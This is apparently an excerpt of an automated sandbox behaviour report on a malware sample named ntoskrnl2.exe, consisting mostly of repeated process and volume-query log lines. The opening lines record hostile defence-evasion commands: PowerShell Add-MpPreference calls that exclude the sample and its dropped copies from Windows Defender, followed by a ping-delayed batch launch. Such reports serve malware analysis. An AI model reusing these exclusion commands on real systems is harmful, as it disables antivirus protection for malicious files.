                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PLA\Templates\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ntoskrnl2.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\PLA\Templates\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Migration\WTR\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\GFIYCbjKVID.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ntoskrnl2.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\09VUCC0aBk.bat" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe "C:\Program Files\Reference Assemblies\Microsoft\Framework\GFIYCbjKVID.exe"
                    Source: C:\Users\user\Desktop\ntoskrnl2.exeQueries volume information: C:\Users\user\Desktop\ntoskrnl2.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
